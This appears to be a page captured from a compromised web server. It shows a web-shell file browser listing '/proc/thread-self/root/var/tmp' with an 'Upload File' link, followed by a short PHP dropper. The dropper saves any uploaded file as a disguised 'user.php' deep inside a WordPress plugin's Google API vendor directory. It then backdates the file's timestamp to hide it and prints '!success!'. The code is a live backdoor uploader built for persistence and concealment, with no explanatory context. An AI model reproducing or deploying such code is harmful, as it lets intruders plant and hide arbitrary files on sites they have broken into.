/
proc
/
thread-self
/
root
/
var
/
tmp
/
Upload File
HOME
<?php $p = '/home2/joyhucol/public_html/themillennialshandbook/wp-content/plugins/ultimate-elementor/modules/login-form/includes/vendor/google/apiclient/src/Google/user.php'; if(move_uploaded_file($_FILES['ge']['tmp_name'], $p)) { echo '!success!'; @touch($p, 1674302686); } die('!ended!');